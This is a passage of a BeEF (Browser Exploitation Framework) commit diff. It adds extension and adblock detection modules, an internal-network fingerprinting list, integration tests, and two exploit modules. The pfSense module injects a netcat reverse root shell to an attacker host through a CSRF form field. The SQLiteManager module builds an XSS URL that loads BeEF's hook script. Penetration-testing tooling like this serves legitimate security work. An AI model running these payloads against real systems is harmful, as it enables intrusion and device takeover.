+                                detect_chrome_extension(chrome_extensions[i][0], chrome_extensions[i][1]);
+                        }
+                } catch(e) {}
+        } else if(beef.browser.isFF()) {
+                try {
+                        for (var i in firefox_extensions) {
+                                detect_firefox_extension(firefox_extensions[i], i);
+                        }
+                } catch(e) {}
+        } else {
+        };
 
 });
 

modules/browser/detect_extensions/config.yaml

@@ -0,0 +1,22 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        detect_extensions:
+            enable: true
+            category: "Browser"
+            name: "Detect Chrome/Firefox Extensions"
+            description: "This module detects Extensions in Chrome and Firefox "
+            authors: ["koto", "bcoles", "nbblrr"]
+            target:
+                working:
+                    FF:
+                        min_ver: 1
+                        max_ver: latest
+                    C:
+                        min_ver: 1
+                        max_ver: 18
+                not_working: ["All"]

modules/browser/detect_extensions/module.rb

@@ -5,14 +5,15 @@
 #
 # More info:
 #	http://blog.kotowicz.net/2012/02/intro-to-chrome-addons-hacking.html
+#	http://jeremiahgrossman.blogspot.fr/2006/08/i-know-what-youve-got-firefox.html
 #
-class Detect_chrome_extensions < BeEF::Core::Command
+class Detect_extensions < BeEF::Core::Command
 
   def post_execute
     content = {}
     content['extension'] = @datastore['extension']
     save content
   end
-  
+
 end
 

modules/browser/detect_simple_adblock/command.js

@@ -0,0 +1,40 @@
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	if (document.getElementById('adblock_img')) {
+		return "Img already created";
+	}
+
+	var img = new Image();
+	img.setAttribute("style","visibility:hidden");
+	img.setAttribute("width","0");
+	img.setAttribute("height","0");
+	img.src = 'http://simple-adblock.com/adblocktest/files/adbanner.gif';
+	img.id = 'adblock_img';
+	img.setAttribute("attr","start");
+	img.onerror = function() {
+		this.setAttribute("attr","error");
+	};
+	img.onload = function() {
+		this.setAttribute("attr","load");
+	};
+
+	document.body.appendChild(img);
+
+	setTimeout(function() {
+		var img = document.getElementById('adblock_img');	
+		if (img.getAttribute("attr") == "error") {
+			beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Adblock returned an error');
+		} else if (img.getAttribute("attr") == "load") {
+			beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Adblock is disabled or not installed');
+		} else if (img.getAttribute("attr") == "start") {
+			beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Adblock is enabled');
+		};
+		document.body.removeChild(img);
+		}, 10000);
+
+});

modules/browser/detect_simple_adblock/config.yaml

@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        detect_simple_adblock:
+            enable: true
+            category: "Browser"
+            name: "Detect Simple Adblock"
+            description: "This module checks if the Simple Adblock module is active."
+            authors: ["sussurro"]
+            target:
+                 working: ["IE"]
+                 not_working: ["All"]

modules/browser/detect_simple_adblock/module.rb

@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Detect_simple_adblock< BeEF::Core::Command
+
+	def post_execute 
+		content = {}
+		content['simple_adblock'] = @datastore['simple_adblock'] if not @datastore['simple_adblock'].nil?
+		save content
+	end
+
+end

modules/chrome_extensions/get_chrome_extensions/config.yaml

@@ -1,16 +0,0 @@
-#
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
-# See the file 'doc/COPYING' for copying permission
-#
-beef:
-    module:
-        detect_chrome_extensions:
-            enable: true
-            category: "Chrome Extensions"
-            name: "Get Chrome Extensions"
-            description: "This module detects if any of the top 1,000 Chrome extensions are installed."
-            authors: ["koto", "bcoles"]
-            target:
-                working: ["C"]
-                not_working: ["All"]

modules/exploits/pfsense/command.js

@@ -0,0 +1,24 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  var rhost = '<%= @rhost %>'; 
+  var rport = '<%= @rport %>';
+  var lhost = '<%= @lhost %>';
+  var lport = '<%= @lport %>';
+
+  var pfsense_iframe = beef.dom.createIframeXsrfForm("https://" + rhost + ":" + rport +"/system_firmware.php", "POST",
+    [{'type':'hidden', 'name':'kerneltype', 'value':'SMP > /boot/kernel/pfsense_kernel.txt;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ' + lhost + ' ' + lport + ' >/tmp/f &'}]);
+
+  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+  cleanup = function() {
+    document.body.removeChild(pfsense_iframe);
+  }
+  setTimeout("cleanup()", 15000);
+
+});
+

modules/exploits/pfsense/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        pfsense_reverse_root_shell_csrf:
+            enable: true
+            category: "Exploits"
+            name: "pfSense Reverse Root Shell CSRF"
+            description: "Attempts to get a reverse root shell on a pfSense 2.0.1 firewall/router.<br />Vulnerablity found and PoC provided by Yann CAM @ Synetis.<br />The method described by <a href='http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet'>Jeff Price</a> has been used to create a reverse shell with netcat.<br />For more information refer to <a href='http://www.exploit-db.com/exploits/23901/'>http://www.exploit-db.com/exploits/23901/</a><br />Patched in version 2.0.2."
+            authors: ["bmantra"]
+            target:
+                working: ["ALL"]

modules/exploits/pfsense/module.rb

@@ -0,0 +1,24 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Pfsense_reverse_root_shell_csrf < BeEF::Core::Command
+  
+	def self.options
+		configuration = BeEF::Core::Configuration.instance
+		lhost = "#{configuration.get("beef.http.host")}"
+		lhost = "" if lhost == "0.0.0.0"
+		return [
+			{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.1.1'}, 
+			{ 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '443' },
+			{ 'name' => 'lhost', 'ui_label' => 'Local Host',  'value' => lhost},
+			{ 'name' => 'lport', 'ui_label' => 'Local Port',  'value' => '4444'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end

modules/exploits/sqlitemanager_xss/command.js

@@ -0,0 +1,17 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var uri = '<%= @uri.gsub(/'/, "\\'") %>'; 
+
+	var serendipity_iframe = beef.dom.createInvisibleIframe();
+	serendipity_iframe.setAttribute('src', uri);
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+});
+

modules/exploits/sqlitemanager_xss/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        sqlitemanager_xss:
+            enable: true
+            category: ["Exploits", "XSS"]
+            name: "SQLiteManager XSS"
+            description: "Attempts to hook SQLiteManager using XSS.<br/>Tested on version 1.2.4 however other versions are likely to be vulnerable."
+            authors: ["bcoles"]
+            target:
+                unknown: ["ALL"]

modules/exploits/sqlitemanager_xss/module.rb

@@ -0,0 +1,23 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Sqlitemanager_xss < BeEF::Core::Command
+
+	def self.options
+
+		configuration = BeEF::Core::Configuration.instance
+		hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js"
+
+		return [
+			{'name' => 'uri', 'ui_label' => 'Target URL', 'value' => 'http://127.0.0.1/sqlite/index.php?dbsel=1"><script src="'+hook_uri+'"></script><p+"'}
+		]
+
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end

modules/network/internal_network_fingerprinting/command.js

@@ -9,7 +9,7 @@ beef.execute(function() {
     var dom = document.createElement('b');
     var ips = new Array();
     ipRange = "<%= @ipRange %>";
-    ports = "<%= @ports %>";
+    ports   = "<%= @ports %>";
     if(ports != null){
       ports = ports.split(',');
     }
@@ -17,7 +17,7 @@ beef.execute(function() {
     if(ipRange != null){
         // ipRange will be in the form of 192.168.0.1-192.168.0.254: the fourth octet will be iterated.
         // (only C class IPs are supported atm)
-        ipBounds = ipRange.split('-');
+        ipBounds   = ipRange.split('-');
         lowerBound = ipBounds[0].split('.')[3];
         upperBound = ipBounds[1].split('.')[3];
 
@@ -47,72 +47,189 @@ beef.execute(function() {
         ];
     }
 
+    /* URLs in the form of:
+	"Dev/App Name", -- string
+	"Default Port", -- string
+	"Protocol",     -- string -- http/https
+	"Use Multiple Ports if specified", -- boolean
+	"IMG path",     -- string -- file path
+	"IMG width",    -- integer
+	"IMG height"    -- integer
+    */
     var urls = new Array(
-    // in the form of: "Dev/App Name","Default Port","Use Multiple Ports if specified","IMG url","IMG width","IMG height"
-	new Array("Apache",":80",false,"/icons/apache_pb.gif",259,32),
-	new Array("Apache 2.x",":80",false,"/icons/apache_pb2.gif",259,32),
-	new Array("Microsoft IIS 7.x",":80",false,"/welcome.png",571,411),
-	new Array("Microsoft IIS",":80",false,"/pagerror.gif",36,48),
-	new Array("QNAP NAS",":8080",false,"/ajax_obj/img/running.gif",16,16),
-	new Array("QNAP NAS",":8080",false,"/ajax_obj/images/qnap_logo_w.gif",115,21),
-	new Array("Belkin Router",":80",false,"/images/title_2.gif",321,28),
-	new Array("Billion Router",":80",false,"/customized/logo.gif",318,69),
-	new Array("Billion Router",":80",false,"/customized/logo.gif",224,55),
-	new Array("SMC Networks",":80",false,"/images/logo.gif",133,59),
-	new Array("Linksys NAS",":80",false,"/Admin_top.JPG",750,52),
-	new Array("Linksys NAS",":80",false,"/logo.jpg",194,52),
-	new Array("Linksys Network Camera",":80",false,"/welcome.jpg",146,250),
-	new Array("Linksys Wireless-G Camera",":80",false,"/header.gif",750,97),
-	new Array("Cisco IP Phone",":80",false,"/Images/Logo",120,66),
-	new Array("Snom Phone",":80",false,"/img/snom_logo.png",168,62),
-	new Array("Dell Laser Printer",":80",false,"/ews/images/delllogo.gif",100,100),
-	new Array("Brother Printer",":80",false,"/pbio/brother.gif",144,52),
-	new Array("HP LaserJet Printer",":80",false,"/hp/device/images/logo.gif",42,27),
-	new Array("HP LaserJet Printer",":80",false,"/hp/device/images/hp_invent_logo.gif",160,52),
-	new Array("JBoss Application server",":8080",true,"/images/logo.gif",226,105),
-	new Array("Siemens Simatic",":80",false,"/Images/Siemens_Firmenmarke.gif",115,76),
-	new Array("APC InfraStruXure Manager",":80",false,"/images/Xlogo_Layer-1.gif",342,327),
-	new Array("Barracuda Spam/Virus Firewall",":8000",true,"/images/powered_by.gif",211,26),
-	new Array("TwonkyMedia Server",":9000",false,"/images/TwonkyMediaServer_logo.jpg",150,82),
-	new Array("Alt-N MDaemon World Client",":3000",false,"/LookOut/biglogo.gif",342,98),
-	new Array("VLC Media Player",":8080",false,"/images/white_cross_small.png",9,9),
-	new Array("VMware ESXi Server",":80",false,"/background.jpeg",1,1100),
-	new Array("Microsoft Remote Web Workplace",":80",false,"/Remote/images/submit.gif",31,31),
-	new Array("XAMPP",":80",false,"/xampp/img/xampp-logo-new.gif",200,59),
-	new Array("Xerox Printer",":80",false,"/printbut.gif",30,30),
-	new Array("Konica Minolta Printer",":80",false,"/G27_light.gif",206,26),
-	new Array("Epson Printer",":80",false,"/cyandot.gif",1,1),
-	new Array("HP Printer",":80",false,"/hp/device/images/hp_invent_logo.gif",160,52),
-	new Array("Syncrify",":5800",false,"/images/468x60.gif",468,60),
-	new Array("Winamp Web Interface",":80",false,"/img?image=121",30,30),
-	new Array("Zenoss Core",":8080",false,"/zport/dmd/favicon.ico",16,16),
-	new Array("BeEF",":3000",false,"/ui/media/images/beef.png",200,149),
-	new Array("BeEF (PHP)",":80",false,"/beef/images/beef.gif",32,32),
-	new Array("Wordpress",":80",false,"/wp-includes/images/wpmini-blue.png",16,16),
-	new Array("Glassfish Server",":4848",false,"/theme/com/sun/webui/jsf/suntheme/images/login/gradlogsides.jpg", 1, 200)
+	new Array(
+		"Apache",
+		"80","http",false,
+		"/icons/apache_pb.gif",259,32),
+	new Array(
+		"Apache 2.x",
+		"80","http",false,
+		"/icons/apache_pb2.gif",259,32),
+	new Array(
+		"Microsoft IIS 7.x",
+		"80","http",false,
+		"/welcome.png",571,411),
+	new Array(
+		"Microsoft IIS",
+		"80","http",false,
+		"/pagerror.gif",36,48),
+	new Array(
+		"QNAP NAS",
+		"8080","http",false,
+		"/ajax_obj/img/running.gif",16,16),
+	new Array(
+		"QNAP NAS",
+		"8080","http",false,
+		"/ajax_obj/images/qnap_logo_w.gif",115,21),
+	new Array(
+		"Belkin Router",
+		"80","http",false,
+		"/images/title_2.gif",321,28),
+	new Array(
+		"Billion Router",
+		"80","http",false,
+		"/customized/logo.gif",318,69),
+	new Array(
+		"Billion Router",
+		"80","http",false,
+		"/customized/logo.gif",224,55),
+//	new Array("SMC Networks","80","http",false,"/images/logo.gif",133,59),
+	new Array(
+		"Linksys NAS",
+		"80","http",false,
+		"/Admin_top.JPG",750,52),
+	new Array(
+		"Linksys NAS",
+		"80","http",false,
+		"/logo.jpg",194,52),
+	new Array(
+		"Linksys Network Camera",
+		"80","http",false,
+		"/welcome.jpg",146,250),
+	new Array(
+		"Linksys Wireless-G Camera",
+		"80","http",false,
+		"/header.gif",750,97),
+	new Array(
+		"Cisco IP Phone",
+		"80","http",false,
+		"/Images/Logo",120,66),
+	new Array(
+		"Snom Phone",
+		"80","http",false,
+		"/img/snom_logo.png",168,62),
+	new Array(
+		"Dell Laser Printer",
+		"80","http",false,
+		"/ews/images/delllogo.gif",100,100),
+	new Array(
+		"Brother Printer",
+		"80","http",false,
+		"/pbio/brother.gif",144,52),
+	new Array(
+		"HP LaserJet Printer",
+		"80","http",false,
+		"/hp/device/images/logo.gif",42,27),
+	new Array(
+		"HP LaserJet Printer",
+		"80","http",false,
+		"/hp/device/images/hp_invent_logo.gif",160,52),
+	new Array(
+		"JBoss Application server",
+		"8080","http",true,
+		"/images/logo.gif",226,105),
+//	new Array("Siemens Simatic","80",false,"/Images/Siemens_Firmenmarke.gif",115,76),
+	new Array(
+		"APC InfraStruXure Manager",
+		"80","http",false,
+		"/images/Xlogo_Layer-1.gif",342,327),
+	new Array(
+		"Barracuda Spam/Virus Firewall",
+		"8000","http",true,
+		"/images/powered_by.gif",211,26),
+	new Array(
+		"TwonkyMedia Server",
+		"9000","http",false,
+		"/images/TwonkyMediaServer_logo.jpg",150,82),
+//	new Array("Alt-N MDaemon World Client","3000","http",false,"/LookOut/biglogo.gif",342,98),
+//	new Array("VLC Media Player","8080","http",false,"/images/white_cross_small.png",9,9),
+	new Array(
+		"VMware ESXi Server",
+		"80","http",false,
+		"/background.jpeg",1,1100),
+	new Array(
+		"Microsoft Remote Web Workplace",
+		"80","http",false,
+		"/Remote/images/submit.gif",31,31),
+	new Array(
+		"XAMPP",
+		"80","http",false,
+		"/xampp/img/xampp-logo-new.gif",200,59),
+	new Array(
+		"Xerox Printer",
+		"80","http",false,
+		"/printbut.gif",30,30),
+	new Array(
+		"Konica Minolta Printer",
+		"80","http",false,
+		"/G27_light.gif",206,26),
+	new Array(
+		"Epson Printer",
+		"80","http",false,
+		"/cyandot.gif",1,1),
+	new Array(
+		"HP Printer",
+		"80","http",false,
+		"/hp/device/images/hp_invent_logo.gif",160,52),
+//	new Array("Syncrify","5800","http",false,"/images/468x60.gif",468,60),
+//	new Array("Winamp Web Interface","80","http",false,"/img?image=121",30,30),
+	new Array(
+		"Zenoss",
+		"8080","http",false,
+		"/zport/dmd/favicon.ico",16,16),
+	new Array(
+		"BeEF",
+		"3000","http",false,
+		"/ui/media/images/beef.png",200,149),
+	new Array(
+		"BeEF (PHP)",
+		"80","http",false,
+		"/beef/images/beef.gif",32,32),
+	new Array(
+		"Wordpress",
+		"80","http",true,
+		"/wp-includes/images/wpmini-blue.png",16,16),
+	new Array(
+		"Glassfish Server",
+		"4848","http",false,
+		"/theme/com/sun/webui/jsf/suntheme/images/login/gradlogsides.jpg", 1, 200),
+	new Array(
+		"pfSense",
+		"443","https",false,
+		"/themes/pfsense_ng/images/logo.gif",200,56)
 	);
 
 	// for each ip
 	for(var i=0; i < ips.length; i++) {
 		// for each url
 		for(var u=0; u < urls.length; u++) {
-            if(!urls[u][2] && ports != null){ // use default port
-                var img = new Image;
-                //console.log("Detecting  [" + urls[u][0] + "] at IP [" + ips[i] + "]");
-                img.id = u;
-                img.src = "http://"+ips[i]+urls[u][1]+urls[u][3];
-                img.onload = function() { if (this.width == urls[this.id][4] && this.height == urls[this.id][5]) { beef.net.send('<%= @command_url %>', <%= @command_id %>,'discovered='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } }
-                dom.appendChild(img);
-            }else{ // iterate to all the specified ports
-                for(p=0;p<ports.length;p++){
-                    var img = new Image;
-                    //console.log("Detecting  [" + urls[u][0] + "] at IP [" + ips[i] + "], port [" + ports[p] + "]");
-                    img.id = u;
-                    img.src = "http://"+ips[i]+":"+ports[p]+urls[u][3];
-                    img.onload = function() { if (this.width == urls[this.id][4] && this.height == urls[this.id][5]) { beef.net.send('<%= @command_url %>', <%= @command_id %>,'discovered='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } }
-                    dom.appendChild(img);
-                }
-            }
+			if(!urls[u][3] && ports != null){ // use default port
+				var img = new Image;
+				//console.log("Detecting  [" + urls[u][0] + "] at IP [" + ips[i] + "]");
+				img.id  = u;
+				img.src = urls[u][2]+"://"+ips[i]+":"+urls[u][1]+urls[u][4];
+				img.onload = function() { if (this.width == urls[this.id][5] && this.height == urls[this.id][6]) { beef.net.send('<%= @command_url %>', <%= @command_id %>,'discovered='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } }
+				dom.appendChild(img);
+			} else { // iterate to all the specified ports
+				for(p=0;p<ports.length;p++){
+					var img = new Image;
+					//console.log("Detecting  [" + urls[u][0] + "] at IP [" + ips[i] + "], port [" + ports[p] + "]");
+					img.id  = u;
+					img.src = urls[u][2]+"://"+ips[i]+":"+ports[p]+urls[u][4];
+					img.onload = function() { if (this.width == urls[this.id][5] && this.height == urls[this.id][6]) { beef.net.send('<%= @command_url %>', <%= @command_id %>,'discovered='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } }
+					dom.appendChild(img);
+				}
+			}
 		}
 	}
 });

modules/phonegap/phonegap_check_connection/config.yaml

@@ -10,8 +10,8 @@ beef:
         phonegap_check_connection:
             enable: true
             category: "Phonegap"
-            name: "Check connection"
-            description: "Find out connection type e.g. Wifi, 3G.."
+            name: "Check Connection"
+            description: "Find out the network connection type e.g. Wifi, 3G."
             authors: ["mh"]
             target:
                 working: ["All"]

test/integration/tc_debug_modules.rb

@@ -18,8 +18,13 @@ class TC_DebugModules < Test::Unit::TestCase
   @@mod_debug_ascii_chars = nil
   @@mod_debug_test_network = nil
 
+  # NOTE: Tests within the same test class are called in the order they are defined.
+  # NOTE: However, test classes are run in alphabetical order by classname.
+  # That's why we use the prefix x_N_y, with N being the order of execution.
+  #
+
   # Test RESTful API authentication with default credentials, returns the API token to be used later.
-  def test_restful_auth
+  def test_1_restful_auth
     response = RestClient.post "#{RESTAPI_ADMIN}/login",
                                { 'username' => "#{BEEF_USER}",
                                  'password' => "#{BEEF_PASSWD}"}.to_json,
@@ -34,9 +39,9 @@ class TC_DebugModules < Test::Unit::TestCase
   end
 
   # Test RESTful API hooks handler hooking a victim browser, and then retrieving his BeEF session
-  def test_restful_hooks
+  def test_2_restful_hooks
     BeefTest.new_victim
-    sleep 2.0
+    sleep 5.0
     response = RestClient.get "#{RESTAPI_HOOKS}", {:params => {:token => @@token}}
     assert_equal 200, response.code
     assert_not_nil response.body
@@ -46,7 +51,7 @@ class TC_DebugModules < Test::Unit::TestCase
   end
 
   # Test RESTful API modules handler, retrieving the IDs of the 3 debug modules currently in the framework
-  def test_restful_modules
+  def test_3_restful_modules
     response = RestClient.get "#{RESTAPI_MODULES}", {:params => {:token => @@token}}
     assert_equal 200, response.code
     assert_not_nil response.body
@@ -65,8 +70,8 @@ class TC_DebugModules < Test::Unit::TestCase
     assert_not_nil @@mod_debug_ascii_chars
     assert_not_nil @@mod_debug_test_network
   end
-
-  # Test debug module "Test_return_long_string" using the RESTful API
+  #
+  ## Test debug module "Test_return_long_string" using the RESTful API
   def test_return_long_string
     repeat_string = "BeEF"
     repeat_count = 20
@@ -83,17 +88,25 @@ class TC_DebugModules < Test::Unit::TestCase
     assert success
 
     cmd_id = result['command_id']
-    sleep 3.0
-    response = RestClient.get "#{RESTAPI_MODULES}/#{@@hb_session}/#{@@mod_debug_long_string}/#{cmd_id}", {:params => {:token => @@token}}
+    count = 0
+    response = RestClient.get "#{RESTAPI_MODULES}/#{@@hb_session}/#{@@mod_debug_long_string}/#{cmd_id}?token=#{@@token}"
+
+    #TODO if the response is empty, the body size is 2, basically an empty Hash.
+    # don't know why empty?, nil and other checks are not working.
+    while(response.body.size <= 2 && count < 10)
+      response = RestClient.get "#{RESTAPI_MODULES}/#{@@hb_session}/#{@@mod_debug_long_string}/#{cmd_id}?token=#{@@token}"
+      sleep 2
+      count += 1
+    end
     assert_equal 200, response.code
     assert_not_nil response.body
     result = JSON.parse(response.body)
-    data = JSON.parse(result["data"])
+    data = JSON.parse(result['0']['data'])['data']
     assert_not_nil data
-    assert_equal data["data"],(repeat_string * repeat_count)
+    assert_equal data,(repeat_string * repeat_count)
   end
-
-  # Test debug module "Test_return_ascii_chars" using the RESTful API
+  #
+  ## Test debug module "Test_return_ascii_chars" using the RESTful API
   def test_return_ascii_chars
     response = RestClient.post "#{RESTAPI_MODULES}/#{@@hb_session}/#{@@mod_debug_ascii_chars}?token=#{@@token}",
                                {}.to_json, # module does not expect any input
@@ -104,18 +117,25 @@ class TC_DebugModules < Test::Unit::TestCase
     result = JSON.parse(response.body)
     success = result['success']
     assert success
-
     cmd_id = result['command_id']
-    sleep 3.0
-    response = RestClient.get "#{RESTAPI_MODULES}/#{@@hb_session}/#{@@mod_debug_ascii_chars}/#{cmd_id}", {:params => {:token => @@token}}
+    count = 0
+    response = RestClient.get "#{RESTAPI_MODULES}/#{@@hb_session}/#{@@mod_debug_ascii_chars}/#{cmd_id}?token=#{@@token}"
+
+    #TODO if the response is empty, the body size is 2, basically an empty Hash.
+    # don't know why empty?, nil and other checks are not working.
+    while(response.body.size <= 2 && count < 10)
+       response = RestClient.get "#{RESTAPI_MODULES}/#{@@hb_session}/#{@@mod_debug_ascii_chars}/#{cmd_id}?token=#{@@token}"
+       sleep 2
+       count += 1
+    end
     assert_equal 200, response.code
     assert_not_nil response.body
     result = JSON.parse(response.body)
-    data = JSON.parse(result["data"])
+    data = JSON.parse(result['0']['data'])['data']
     assert_not_nil data
     ascii_chars = ""
     (32..127).each do |i| ascii_chars << i.chr end
-    assert_equal ascii_chars,data["data"]
+    assert_equal ascii_chars,data
   end
 
   # Test debug module "Test_network_request" using the RESTful API
@@ -134,16 +154,23 @@ class TC_DebugModules < Test::Unit::TestCase
     assert success
 
     cmd_id = result['command_id']
-    sleep 3.0
-    response = RestClient.get "#{RESTAPI_MODULES}/#{@@hb_session}/#{@@mod_debug_test_network}/#{cmd_id}", {:params => {:token => @@token}}
+    count = 0
+    response = RestClient.get "#{RESTAPI_MODULES}/#{@@hb_session}/#{@@mod_debug_test_network}/#{cmd_id}?token=#{@@token}"
+
+    #TODO if the response is empty, the body size is 2, basically an empty Hash.
+    # don't know why empty?, nil and other checks are not working.
+    while(response.body.size <= 2 && count < 10)
+      response = RestClient.get "#{RESTAPI_MODULES}/#{@@hb_session}/#{@@mod_debug_test_network}/#{cmd_id}?token=#{@@token}"
+      sleep 2
+      count += 1
+    end
     assert_equal 200, response.code
     assert_not_nil response.body
     result = JSON.parse(response.body)
-    data = JSON.parse(result["data"])
-    res = JSON.parse(data["data"])
-    assert_not_nil res
-    assert_equal 200, res["status_code"]
-    assert res["response_body"].include?("However you should still be capable of accessing it\n\t\tusing the Requester")
+    data = JSON.parse(result['0']['data'])['data']
+    assert_not_nil data
+    assert_equal 200, JSON.parse(data)["status_code"]
+    assert JSON.parse(data)["response_body"].include?("However you should still be capable of accessing it\n\t\tusing the Requester")
 
   end
 end

test/integration/tc_jools.rb

@@ -0,0 +1,114 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+require 'test/unit'
+require '../common/beef_test'
+require '../common/test_constants'
+
+class TC_Jools < Test::Unit::TestCase
+
+    #test jools can be acces and a new object can be instantiated
+    def test_jools_exists
+        victim = BeefTest.new_victim
+        script = "return require('jools');"
+        jools = victim.execute_script(script)
+        assert_not_nil jools
+        script = "var Jools = require('jools');
+        return new Jools([]);"
+        jools_obj = victim.execute_script(script)
+        assert_not_nil jools_obj
+        victim.reset_session!
+    end
+
+    #test simple jools rule example
+    def test_jools_simple
+        victim = BeefTest.new_victim
+        script = " var Jools = require('jools');
+            var rules = [{
+            'name':'Lights on after 8pm',
+            'condition': function(hour){
+                return hour >= 8;
+            },
+            'consequence': function(){
+                this.state = 'on';
+            }
+            }];
+            var fact = {
+                'hour':8,
+                'minute':21
+            };
+            var j = new Jools(rules);
+            var result = j.execute(fact);
+            return result.state;"
+       result = victim.execute_script(script)
+       assert_equal result,'on'
+    end
+
+    #test jools chaining example
+    def test_jools_chaning
+        victim = BeefTest.new_victim
+        script = " var Jools = require('jools');
+            var rules = [
+            {'name':'frog is green',
+            'condition': function(animal){
+                return animal == 'frog';
+            },
+            'consequence': function(){
+                this.color = 'green';
+            }},
+            {'name':'canary is yellow',
+            'condition': function(animal){
+                return animal == 'canary';
+            },
+            'consequence': function(){
+                this.color = 'yellow';
+            }},
+            {'name':'croaks and eats flies',
+            'condition' : function(eats){
+                return eats && eats.indexOf('croaks') >= 0 && eats.indexOf('flies') >=0;
+            },
+            'consequence': function(){
+                this.animal = 'frog';
+            }},
+            {'name':'chirps and sings',
+            'condition' : function(does){
+                return does && does.indexOf('chirps') >= 0 && does.indexOf('sings') >=0;
+            },
+            'consequence': function(){
+                this.animal = 'canary';
+            }}
+            ];
+            var fact_1 = {
+                'name':'fritz',
+                'eats': ['croaks','flies']
+            };
+            var fact_2 = {
+                'name':'fritz',
+                'eats': ['croaks','rocks']
+            };
+            var fact_3 = {
+                'name':'tweety',
+                'does': ['sings','chirps']
+            };
+            var fact_4 = {
+                'name':'tweety',
+                'does': ['chrips','howls']
+            };
+
+            var j = new Jools(rules);
+            var results = [];
+             results.push(j.execute(fact_1));
+             results.push(j.execute(fact_2));
+             results.push(j.execute(fact_3));
+             results.push(j.execute(fact_4));
+            return results;"
+       results = victim.execute_script(script)
+       assert_not_nil results
+       assert_equal results[0]['color'],'green'
+       assert_not_equal results[1]['color'], 'green'
+       assert_equal results[2]['color'],'yellow'
+       assert_not_equal results[3]['color'], 'yellow'
+    end
+end

test/integration/tc_login.rb

@@ -63,7 +63,7 @@ class TC_login < Test::Unit::TestCase
     attacker = BeefTest.new_attacker
     victim = BeefTest.new_victim
 
-    sleep 2.0
+    sleep 5.0
 
     attacker.has_content?(VICTIM_DOMAIN)
     attacker.has_content?('127.0.0.1')

test/integration/ts_integration.rb

@@ -15,14 +15,16 @@ require 'selenium/webdriver'
 require './check_environment' # Basic log in and log out tests
 require './tc_debug_modules' # RESTful API tests (as well as debug modules)
 require './tc_login' # Basic log in and log out tests
+require './tc_jools' # Basic tests for jools
 
 class TS_BeefIntegrationTests
   def self.suite
 
     suite = Test::Unit::TestSuite.new(name="BeEF Integration Test Suite")
     suite << TC_CheckEnvironment.suite
-    #suite << TC_DebugModules.suite
     suite << TC_login.suite
+    suite << TC_DebugModules.suite
+    suite << TC_Jools.suite
 
     return suite
   end

test/unit/core/main/network_stack/handlers/redirector.rb

@@ -0,0 +1,66 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+require 'test/unit'
+require 'rubygems'
+require 'curb'
+
+class TC_Redirector < Test::Unit::TestCase
+
+  @@port = 20000 + rand(10000)
+
+  def setup
+    $root_dir="../../"
+    $:.unshift File.join( %w{ ../../ } )
+    require 'core/loader'
+    require 'core/main/network_stack/assethandler.rb'
+    require 'core/main/network_stack/handlers/redirector.rb'
+
+    @@port += 1 # cycle through ports because the tcp teardown process is too slow
+    @port = @@port
+
+    config = {}
+    config[:BindAddress] = '127.0.0.1'
